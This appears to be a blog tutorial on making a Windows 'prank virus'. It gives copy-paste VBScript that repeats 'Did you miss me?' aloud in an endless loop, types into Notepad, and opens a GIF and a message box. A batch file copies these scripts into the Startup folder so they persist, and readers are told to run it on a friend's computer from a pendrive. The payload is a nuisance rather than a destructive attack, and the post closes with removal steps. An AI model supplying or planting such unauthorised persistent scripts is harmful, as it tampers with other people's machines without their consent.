Ultimate Prank Virus
What will this virus do?
1) Speak in the background in computer voice “Did you miss me?”
2) It will automatically open the notepad and start tying one letter at a time like a ghost “Did you miss me?”
3) Open a gif image that shows you smiling like a creep. (mwhahahahahaha)
4) Open a dialog box that says “Did you miss me?”
5) Add itself to the start up.So that whenever the victim opens up his computer.The virus automatically executes itself.
What do i need to know to make this virus?
Let’s get started we will make one part of the virus at a time.You can just copy the code and execute the the virus or download all the files that i have given at the bottom of the post and just execute it.But ill also explain how and why it’s happening on the way for you curious people out there.
Getting started
Make a new folder and where on your computer and rename it as ‘Did you miss me’. We will do all our stuff inside this folder.
1) Making Virus Speak in the background in computer voice “Did you miss me?”
-We will make a new text file inside our ‘Did you miss me’ folder.Rename it as ‘music.vbs’ (Make sure ‘Hide extensions in known file types’ is unticked in Folder options.If you don’t know how to do it.Click here.)
-Right click on that file.Click on edit and then copy this code inside it.
{
Do While 100>10 CreateObject(“SAPI.SpVoice”).Speak”Did you miss me?” Loop
}
-Save this file
--->>So what’s happening? --->What this code does is it makes an infinite loop as 100 will always be greater than zero.Then we are using an in-built function called SAPI in vbs to make computer speak those words.
2) Making Virus automatically open the notepad and start tying one letter at a time like a ghost “Did you miss me?”
-Make another new text file inside our ‘Did you miss me’ folder.Rename it as ‘write.vbs’ (Make sure Hide extensions in known file types is unticked in Folder options)
-Right click on that file.Click on edit and then copy this code inside it.
{
set wshshell = wscript.CreateObject(“wscript.shell”) wshshell.run “Notepad” wscript.sleep 2000 wshshell.AppActivate “Notepad” WshShell.SendKeys “D” WScript.Sleep 500 WshShell.SendKeys “i” WScript.Sleep 500 WshShell.SendKeys “d” WScript.Sleep 500 WshShell.SendKeys ” ” WScript.Sleep 500 WshShell.SendKeys “Y” WScript.Sleep 500 WshShell.SendKeys “o” WScript.Sleep 500 WshShell.SendKeys “u” WScript.Sleep 500 WshShell.SendKeys ” ” WScript.Sleep 500 WshShell.SendKeys “M” WScript.Sleep 500 WshShell.SendKeys “i” WScript.Sleep 500 WshShell.SendKeys “s” WScript.Sleep 500 WshShell.SendKeys “s” WScript.Sleep 500 WshShell.SendKeys ” ” WScript.Sleep 500 WshShell.SendKeys “M” WScript.Sleep 500 WshShell.SendKeys “e” WScript.Sleep 500 WshShell.SendKeys “?” WScript.Sleep 500
}
-Save this file
--->So what’s happening?
--->You can find out what’s happening by double clicking on the file itself. It basically tells your computer to press a key from you keyboard and then wait for 500 milliseconds and then press the second key and so on.
3)Making Virus Open a gif image that shows you smiling like a creep. (mwhahahahahaha)”
-Make another new text file inside our ‘Did you miss me’ folder.Rename it as ‘opengif.vbs’ (Make sure Hide extensions in known file types is unticked in Folder options)
-Right click on that file.Click on edit and then copy this code inside it.
CreateObject(“WScript.Shell”).Run(“””missme.gif”””)
-Save this file
-->So what does this code do? -->It runs the file called missme.gif
-Create a gif that shows you smiling like a creep.
Note: Gif is just a picture format that basically shows two or mre images one after another so it seems like the object in the picture are moving. (You can make a gif easily. Just take two images one smiling and one serious and combine it using http://makeagif.com/
Example:
-Rename the gif as missme.gif and put it in ‘Did you miss me’ folder.
4) Making Virus open a dialog box that says “Did you miss me?”
-Yeah you guessed it right.Make a new text file inside our ‘Did you miss me’ folder.Rename it as ‘pop.vbs’ (Make sure Hide extensions in known file types is unticked in Folder options)
-Right click on that file.Click on edit and then copy this code inside it.
x=msgbox (“Did you miss me?” ,4096, “Your name”)
-Save this file
5) Make a script that opens all the above 4 made files one after another
-Make a new text file inside our ‘Did you miss me’ folder.Rename it as ‘index.vbs’ (Make sure Hide extensions in known file types is unticked in Folder options)
-Right click on that file.Click on edit and then copy this code inside it.
{
CreateObject(“WScript.Shell”).Run(“””music.vbs”””) CreateObject(“WScript.Shell”).Run(“””write.vbs”””) wscript.sleep 10000 CreateObject(“WScript.Shell”).Run(“””missme.gif”””) CreateObject(“WScript.Shell”).Run(“””pop.vbs”””)
}
-Save this file
--> So what does this code do? -->It runs different files.
6) Make another batch script that copies all the above 5 made files into a folder called ‘Start up’. This ‘Start up’ folder is made built in by default in windows.If we ever need anything to be started at the time of starting of Windows.We have to place it this folder.We are going to make a batch script that does this automatically for us.
-Make a new text file inside our ‘Did you miss me’ folder.Rename it as ‘copy.bat’ (Make sure Hide extensions in known file types is unticked in Folder options)
-Right click on that file and copy this code inside it.
{
@echo off xcopy music.vbs “%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartUp” xcopy pop.vbs “%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartUp” xcopy write.vbs “%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartUp” xcopy opengif.vbs “%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartUp” xcopy missme.gif “%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartUp”
}
-Save this file
Now copy the folder in your pendrive and whenever you want to execute the virus just put your pendrive in your friends computer and double click on ‘copy.bat’. Thus whenever his computer starts the virus will get started automatically.
How to stop this virus?
1) Close all the windows that open after the virus gets executed.
2) To stop the sound that says ‘Did you miss me?”. Go to Task manager and end process the process called ‘Microsoft ® Windows Based Script Host’ or sometimes it’s wscript.exe.
3) Delete all the files from start up folder.
Leave a Comment